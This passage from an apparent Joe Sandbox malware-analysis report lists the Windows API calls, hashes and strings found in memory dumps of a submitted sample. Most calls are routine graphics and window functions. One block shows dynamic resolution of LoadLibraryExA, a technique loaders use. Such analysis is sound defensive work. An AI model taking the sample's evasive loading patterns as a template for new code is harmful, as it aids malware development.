                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Select$ObjectPalette$ColorStretch$CompatibleCreateDelete$BitmapText$MaskRealize
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3976802218-0
                                                                                                                                            • Opcode ID: b512bcc4b605714e26be66b5c6317febf335f045ca9f19c0ba51a2fda4ec9fa9
                                                                                                                                            • Instruction ID: 621b23ed4f9cddc4a62cc70dd8052ad59a39354f728ed0fff5b7e110cf823c61
                                                                                                                                            • Opcode Fuzzy Hash: b512bcc4b605714e26be66b5c6317febf335f045ca9f19c0ba51a2fda4ec9fa9
                                                                                                                                            • Instruction Fuzzy Hash: 5F819DB2A00249AFDB90EFA9DC84EAF7BFDAB4C710F114554FA18E7240C635E9009B64
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetObjectA.GDI32(?,00000054,?), ref: 029F5667
                                                                                                                                            • GetDC.USER32(00000000), ref: 029F5695
                                                                                                                                            • CreateCompatibleDC.GDI32(?), ref: 029F56A6
                                                                                                                                            • CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 029F56C1
                                                                                                                                            • SelectObject.GDI32(?,00000000), ref: 029F56DB
                                                                                                                                            • PatBlt.GDI32(?,00000000,00000000,?,?,00000042), ref: 029F56FD
                                                                                                                                            • CreateCompatibleDC.GDI32(?), ref: 029F570B
                                                                                                                                            • SelectObject.GDI32(?), ref: 029F5753
                                                                                                                                            • SelectPalette.GDI32(?,?,00000000), ref: 029F5766
                                                                                                                                            • RealizePalette.GDI32(?), ref: 029F576F
                                                                                                                                            • SelectPalette.GDI32(?,?,00000000), ref: 029F577B
                                                                                                                                            • RealizePalette.GDI32(?), ref: 029F5784
                                                                                                                                            • SetBkColor.GDI32(?), ref: 029F578E
                                                                                                                                            • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 029F57B2
                                                                                                                                            • SetBkColor.GDI32(?,00000000), ref: 029F57BC
                                                                                                                                            • SelectObject.GDI32(?,00000000), ref: 029F57CF
                                                                                                                                            • DeleteObject.GDI32 ref: 029F57DB
                                                                                                                                            • DeleteDC.GDI32(?), ref: 029F57F1
                                                                                                                                            • SelectObject.GDI32(?,00000000), ref: 029F580C
                                                                                                                                            • DeleteDC.GDI32(00000000), ref: 029F5828
                                                                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 029F5839
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ObjectSelect$Palette$CreateDelete$ColorCompatibleRealize$BitmapRelease
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 332224125-0
                                                                                                                                            • Opcode ID: b02542fce46ad56fddab4a882a562aaa8725022c560b0202646a9eb21c4dfe99
                                                                                                                                            • Instruction ID: de5165c6785daab2dea56c58aa16496aed04c46eaf95ccfdb9d685910e094cca
                                                                                                                                            • Opcode Fuzzy Hash: b02542fce46ad56fddab4a882a562aaa8725022c560b0202646a9eb21c4dfe99
                                                                                                                                            • Instruction Fuzzy Hash: 69511A71E00249ABDB90EBF9DC84FAEB7FDAF88700F518865B614E7280D7749940DB60
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetDC.USER32(00000000), ref: 029F6642
                                                                                                                                            • CreateCompatibleDC.GDI32(00000001), ref: 029F66A7
                                                                                                                                            • CreateCompatibleBitmap.GDI32(00000001,00000001,00000001), ref: 029F66BC
                                                                                                                                            • SelectObject.GDI32(?,00000000), ref: 029F66C6
                                                                                                                                            • SelectPalette.GDI32(?,?,00000000), ref: 029F66F6
                                                                                                                                            • RealizePalette.GDI32(?), ref: 029F6702
                                                                                                                                            • CreateDIBitmap.GDI32(?,?,00000004,00000000,?,00000000), ref: 029F6726
                                                                                                                                            • GetLastError.KERNEL32(?,?,00000004,00000000,?,00000000,00000000,029F677F,?,?,00000000,00000001,00000001,00000001,00000001,00000000), ref: 029F6734
                                                                                                                                            • SelectPalette.GDI32(?,00000000,000000FF), ref: 029F6766
                                                                                                                                            • SelectObject.GDI32(?,?), ref: 029F6773
                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 029F6779
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Select$CreateObjectPalette$BitmapCompatible$DeleteErrorLastRealize
                                                                                                                                            • String ID: ($BM
                                                                                                                                            • API String ID: 2831685396-2980357723
                                                                                                                                            • Opcode ID: 257e45706544b93f9affe5265054ef79630a6b3ad5929f18e82a0295a9587a1e
                                                                                                                                            • Instruction ID: a952316f8624ff361bb3ea72e22a3c3431d3fd55cd1bc7c238b620fad490a96c
                                                                                                                                            • Opcode Fuzzy Hash: 257e45706544b93f9affe5265054ef79630a6b3ad5929f18e82a0295a9587a1e
                                                                                                                                            • Instruction Fuzzy Hash: 55D12D71A002189FDF94DFA8D884BAEBBFAFF88304F148465EA15E7295D7349844CF61
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetWindowDC.USER32(00000000), ref: 02A12DBC
                                                                                                                                            • GetClientRect.USER32(00000000,?), ref: 02A12DDF
                                                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 02A12DF1
                                                                                                                                            • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 02A12E07
                                                                                                                                            • OffsetRect.USER32(?,?,?), ref: 02A12E1C
                                                                                                                                            • ExcludeClipRect.GDI32(?,?,?,?,?,?,?,?,00000000,00000000,?,00000002,00000000,?,00000000,02A1303B), ref: 02A12E35
                                                                                                                                            • InflateRect.USER32(?,00000000,00000000), ref: 02A12E53
                                                                                                                                            • GetWindowLongA.USER32(00000000,000000F0), ref: 02A12E6D
                                                                                                                                            • DrawEdge.USER32(?,?,?,00000008), ref: 02A12F6C
                                                                                                                                            • IntersectClipRect.GDI32(?,?,?,?,?), ref: 02A12F85
                                                                                                                                            • OffsetRect.USER32(?,?,?), ref: 02A12FAF
                                                                                                                                            • GetRgnBox.GDI32(?,?), ref: 02A12FBE
                                                                                                                                            • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 02A12FD4
                                                                                                                                            • IntersectRect.USER32(?,?,?), ref: 02A12FE5
                                                                                                                                            • OffsetRect.USER32(?,?,?), ref: 02A12FFA
                                                                                                                                            • FillRect.USER32(?,?,00000000), ref: 02A13016
                                                                                                                                            • ReleaseDC.USER32(00000000,?), ref: 02A13035
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Rect$Window$Offset$ClipIntersectPoints$ClientDrawEdgeExcludeFillInflateLongRelease
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2490777911-0
                                                                                                                                            • Opcode ID: 0a1995a0b5ebde7a74c40524f047fa263e13802da4029ffee4973d9dc3fffdf1
                                                                                                                                            • Instruction ID: 9067775fe53d2fc3d3f69a724eeb163aa469fd992785f8a096ffed86a0c01991
                                                                                                                                            • Opcode Fuzzy Hash: 0a1995a0b5ebde7a74c40524f047fa263e13802da4029ffee4973d9dc3fffdf1
                                                                                                                                            • Instruction Fuzzy Hash: B7A10B71E00108AFDB41DBE8C985FEEB7FAAF49314F1480A6E915E7251CB75AA01DF60
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 029F614C: GetDC.USER32(00000000), ref: 029F61A2
                                                                                                                                              • Part of subcall function 029F614C: GetDeviceCaps.GDI32(00000000,0000000C), ref: 029F61B7
                                                                                                                                              • Part of subcall function 029F614C: GetDeviceCaps.GDI32(00000000,0000000E), ref: 029F61C1
                                                                                                                                              • Part of subcall function 029F614C: CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,029F4D0F,00000000,029F4D9B), ref: 029F61E5
                                                                                                                                              • Part of subcall function 029F614C: ReleaseDC.USER32(00000000,00000000), ref: 029F61F0
                                                                                                                                            • SelectPalette.GDI32(?,?,000000FF), ref: 029F5B97
                                                                                                                                            • RealizePalette.GDI32(?), ref: 029F5BA6
                                                                                                                                            • GetDeviceCaps.GDI32(?,0000000C), ref: 029F5BB8
                                                                                                                                            • GetDeviceCaps.GDI32(?,0000000E), ref: 029F5BC7
                                                                                                                                            • GetBrushOrgEx.GDI32(?,?,0000000E,00000000,?,0000000C), ref: 029F5BFA
                                                                                                                                            • SetStretchBltMode.GDI32(?,00000004), ref: 029F5C08
                                                                                                                                            • SetBrushOrgEx.GDI32(?,?,?,?,?,00000004,?,?,0000000E,00000000,?,0000000C), ref: 029F5C20
                                                                                                                                            • SetStretchBltMode.GDI32(00000000,00000003), ref: 029F5C3D
                                                                                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 029F5C9E
                                                                                                                                            • SelectObject.GDI32(?,?), ref: 029F5CB3
                                                                                                                                            • SelectObject.GDI32(?,00000000), ref: 029F5D12
                                                                                                                                            • DeleteDC.GDI32(00000000), ref: 029F5D21
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CapsDevice$PaletteSelect$BrushCreateModeObjectStretch$CompatibleDeleteHalftoneRealizeRelease
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2414602066-0
                                                                                                                                            • Opcode ID: 536f0ccb1c5e148fbe9d3473dabc760f9e4d78106b1869ae53f121ee21c377e0
                                                                                                                                            • Instruction ID: c633646f10f488b96e3502a1e3b313125265fd9025ee17df89ae49841c0bd0f3
                                                                                                                                            • Opcode Fuzzy Hash: 536f0ccb1c5e148fbe9d3473dabc760f9e4d78106b1869ae53f121ee21c377e0
                                                                                                                                            • Instruction Fuzzy Hash: 187125B6A04205AFDB90DBA8D984E5ABBFDAF89300F558554F608DB281D734ED00DF60
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 029F3527
                                                                                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 029F3531
                                                                                                                                            • GetObjectA.GDI32(?,00000018,?), ref: 029F3551
                                                                                                                                            • CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 029F3568
                                                                                                                                            • GetDC.USER32(00000000), ref: 029F3574
                                                                                                                                            • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 029F35A1
                                                                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 029F35C7
                                                                                                                                            • SelectObject.GDI32(?,?), ref: 029F35E2
                                                                                                                                            • SelectObject.GDI32(?,00000000), ref: 029F35F1
                                                                                                                                            • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,?,?,00CC0020), ref: 029F361D
                                                                                                                                            • SelectObject.GDI32(?,00000000), ref: 029F362B
                                                                                                                                            • SelectObject.GDI32(?,00000000), ref: 029F3639
                                                                                                                                            • DeleteDC.GDI32(?), ref: 029F364F
                                                                                                                                            • DeleteDC.GDI32(?), ref: 029F3658
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Object$CreateSelect$Compatible$BitmapDelete$ReleaseStretch
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 644427674-0
                                                                                                                                            • Opcode ID: e01611a867f23863051b2dd9876916cff703e21ccd3c6ed3e818c8134b45c765
                                                                                                                                            • Instruction ID: be3e67a1aff2bbbaa1177c1bce01821297938ebb5b36c2ebca621b501a3208e6
                                                                                                                                            • Opcode Fuzzy Hash: e01611a867f23863051b2dd9876916cff703e21ccd3c6ed3e818c8134b45c765
                                                                                                                                            • Instruction Fuzzy Hash: 8341FC72E04249AFEB90DBE8DC41FAEB7BDEB88700F118455B714E7280D775A9009B64
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • FindWindowA.USER32(MouseZ,Magellan MSWHEEL), ref: 029D7454
                                                                                                                                            • RegisterWindowMessageA.USER32(MSWHEEL_ROLLMSG), ref: 029D7460
                                                                                                                                            • RegisterWindowMessageA.USER32(MSH_WHEELSUPPORT_MSG,MSWHEEL_ROLLMSG), ref: 029D746F
                                                                                                                                            • RegisterWindowMessageA.USER32(MSH_SCROLL_LINES_MSG,MSH_WHEELSUPPORT_MSG,MSWHEEL_ROLLMSG), ref: 029D747B
                                                                                                                                            • SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 029D7493
                                                                                                                                            • SendMessageA.USER32(00000000,?,00000000,00000000), ref: 029D74B7
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Message$Window$Register$Send$Find
                                                                                                                                            • String ID: MSH_SCROLL_LINES_MSG$MSH_WHEELSUPPORT_MSG$MSWHEEL_ROLLMSG$Magellan MSWHEEL$MouseZ
                                                                                                                                            • API String ID: 3569030445-3736581797
                                                                                                                                            • Opcode ID: b22eed0abb9779e8f5e86a4d6d41368b34340d15bf0d4d173d94df0c451388ec
                                                                                                                                            • Instruction ID: f16d82300ba407ebfe62d0cb619ec6e1873034c778af599d70d9d49ccc661c8a
                                                                                                                                            • Opcode Fuzzy Hash: b22eed0abb9779e8f5e86a4d6d41368b34340d15bf0d4d173d94df0c451388ec
                                                                                                                                            • Instruction Fuzzy Hash: 1A112E70644301AFF7119FE5DC81FA6FBAAEF84710F10C466B9498B280D7B0A940EB60
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetWindowLongA.USER32(00000000,000000EC), ref: 029FDDAF
                                                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 029FDDCA
                                                                                                                                            • OffsetRect.USER32(?,?,?), ref: 029FDDDF
                                                                                                                                            • GetWindowDC.USER32(00000000,?,?,?,00000000,?), ref: 029FDDED
                                                                                                                                            • GetWindowLongA.USER32(00000000,000000F0), ref: 029FDE1E
                                                                                                                                            • GetSystemMetrics.USER32(00000002), ref: 029FDE33
                                                                                                                                            • GetSystemMetrics.USER32(00000003), ref: 029FDE3C
                                                                                                                                            • InflateRect.USER32(?,000000FE,000000FE), ref: 029FDE4B
                                                                                                                                            • GetSysColorBrush.USER32(0000000F), ref: 029FDE78
                                                                                                                                            • FillRect.USER32(?,?,00000000), ref: 029FDE86
                                                                                                                                            • ExcludeClipRect.GDI32(?,?,?,?,?,00000000,029FDEEF,?,00000000,?,?,?,00000000,?), ref: 029FDEAB
                                                                                                                                            • ReleaseDC.USER32(00000000,?), ref: 029FDEE9
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Rect$Window$LongMetricsSystem$BrushClipColorExcludeFillInflateOffsetRelease
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 19621357-0
                                                                                                                                            • Opcode ID: e1dcf8dce5c2af69d38bc1696ae7abf659e47647bc6a567b9f5ad5e24cd96238
                                                                                                                                            • Instruction ID: 34d8de62842d58e023e64c9c85da5c06bb601b8e577ee450b212dc2bc4ee5916
                                                                                                                                            • Opcode Fuzzy Hash: e1dcf8dce5c2af69d38bc1696ae7abf659e47647bc6a567b9f5ad5e24cd96238
                                                                                                                                            • Instruction Fuzzy Hash: 79410B71A00109ABDB51EAE8CD41EEFB7BEEF89320F504551FA04F7290DA31AA019B60
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • MessageBoxA.USER32(00000000,?,Unexpected Memory Leak,00002010), ref: 029D296A
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Message
                                                                                                                                            • String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
                                                                                                                                            • API String ID: 2030045667-32948583
                                                                                                                                            • Opcode ID: 42046af54dc52ca03a68b1ef2968a5ba64123022787efc74b132cb886d6d6224
                                                                                                                                            • Instruction ID: 50ec96a51b92c2af497df4a7a64c49192194b55799507aa9a8096bcab3407468
                                                                                                                                            • Opcode Fuzzy Hash: 42046af54dc52ca03a68b1ef2968a5ba64123022787efc74b132cb886d6d6224
                                                                                                                                            • Instruction Fuzzy Hash: B8A1F130E043688BDF21AB2CC884BD9B6E9EB49754F1480E5ED49AB283CB758985DF51
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • EnumDisplayMonitors.USER32(?,?,?,?), ref: 029FB285
                                                                                                                                            • GetSystemMetrics.USER32(00000000), ref: 029FB2AA
                                                                                                                                            • GetSystemMetrics.USER32(00000001), ref: 029FB2B5
                                                                                                                                            • GetClipBox.GDI32(?,?), ref: 029FB2C7
                                                                                                                                            • GetDCOrgEx.GDI32(?,?), ref: 029FB2D4
                                                                                                                                            • OffsetRect.USER32(?,?,?), ref: 029FB2ED
                                                                                                                                            • IntersectRect.USER32(?,?,?), ref: 029FB2FE
                                                                                                                                            • IntersectRect.USER32(?,?,?), ref: 029FB314
                                                                                                                                              • Part of subcall function 029FACA4: GetProcAddress.KERNEL32(75BD0000,00000000), ref: 029FAD23
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Rect$IntersectMetricsSystem$AddressClipDisplayEnumMonitorsOffsetProc
                                                                                                                                            • String ID: EnumDisplayMonitors
                                                                                                                                            • API String ID: 362875416-2491903729
                                                                                                                                            • Opcode ID: 5c78a4b019ce3178c1bb75d5cccc1b3d8b3ac02ddb7509f63f31c12e78289575
                                                                                                                                            • Instruction ID: 853e9e939987235d3c6dd4d204b48850d360890319d71691fe1d8fe2188949fb
                                                                                                                                            • Opcode Fuzzy Hash: 5c78a4b019ce3178c1bb75d5cccc1b3d8b3ac02ddb7509f63f31c12e78289575
                                                                                                                                            • Instruction Fuzzy Hash: F4311B72E41209AFDB90DEE5D884AEFB7BCEF49304F048526EA15E2201EB74D505CBA0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • IsBadReadPtr.KERNEL32(?,00000004,?,00000014), ref: 02A28D04
                                                                                                                                            • GetModuleHandleW.KERNEL32(C:\Windows\System32\KernelBase.dll,LoadLibraryExA,?,00000004,?,00000014), ref: 02A28D1B
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\KernelBase.dll), ref: 02A28D21
                                                                                                                                            • IsBadReadPtr.KERNEL32(?,00000004), ref: 02A28DAF
                                                                                                                                            • IsBadReadPtr.KERNEL32(?,00000002,?,00000004), ref: 02A28DBB
                                                                                                                                            • IsBadReadPtr.KERNEL32(?,00000014), ref: 02A28DCF
                                                                                                                                            Strings
                                                                                                                                            • C:\Windows\System32\KernelBase.dll, xrefs: 02A28D16
                                                                                                                                            • LoadLibraryExA, xrefs: 02A28D11
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Read$AddressHandleModuleProc
                                                                                                                                            • String ID: C:\Windows\System32\KernelBase.dll$LoadLibraryExA
                                                                                                                                            • API String ID: 1061262613-1650066521
                                                                                                                                            • Opcode ID: 6b43fc4113c68451910e42810f7fcccf41bd6126466496868131eaa86777d864
                                                                                                                                            • Instruction ID: c72111b7c4cfc9aa4fed9288c238ef07edd8875a2e7aefd1e31998a5d4f9d058
                                                                                                                                            • Opcode Fuzzy Hash: 6b43fc4113c68451910e42810f7fcccf41bd6126466496868131eaa86777d864
                                                                                                                                            • Instruction Fuzzy Hash: 0A316271640315BFEB20DB68DC85F6977BCEF54328F108514FA14AB281DB78E958DB60
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetDC.USER32(00000000), ref: 02A0FF37
                                                                                                                                            • CreateCompatibleBitmap.GDI32(00000000,?), ref: 02A0FF5B
                                                                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 02A0FF66
                                                                                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 02A0FF6D
                                                                                                                                            • SelectObject.GDI32(00000000,?), ref: 02A0FF7D
                                                                                                                                            • BeginPaint.USER32(00000000,?,00000000,02A1003E,?,00000000,?,00000000,00000000,00000000,00000000,?), ref: 02A0FF9F
                                                                                                                                            • BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 02A0FFFB
                                                                                                                                            • EndPaint.USER32(00000000,?,00000000,00000000,00000000,?,?,00000000,?,00000000,00000000,00000000,00000000,?), ref: 02A1000C
                                                                                                                                            • SelectObject.GDI32(00000000,?), ref: 02A10026
                                                                                                                                            • DeleteDC.GDI32(00000000), ref: 02A1002F
                                                                                                                                            • DeleteObject.GDI32(?), ref: 02A10038
                                                                                                                                              • Part of subcall function 02A0F8F4: BeginPaint.USER32(00000000,?), ref: 02A0F91F
                                                                                                                                              • Part of subcall function 02A0F8F4: EndPaint.USER32(00000000,?,02A0FA5A), ref: 02A0FA4D
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Paint$Object$BeginCompatibleCreateDeleteSelect$BitmapRelease
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3867285559-0
                                                                                                                                            • Opcode ID: 9692139e59d0c6d526955d3562cb9714138eeee684a4d82a1fe4dc6daa193bcd
                                                                                                                                            • Instruction ID: d5603d09c5d51b0ac8678fd5bc2e682e0df5e0d255494251689f0cbb12d66ef1
                                                                                                                                            • Opcode Fuzzy Hash: 9692139e59d0c6d526955d3562cb9714138eeee684a4d82a1fe4dc6daa193bcd
                                                                                                                                            • Instruction Fuzzy Hash: E041EC75B00204AFDB10EBA8DD84B9EB7FDAF89700F108469BA09EB681DE759D05DB50
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • IsWindowUnicode.USER32(?), ref: 02A06E9E
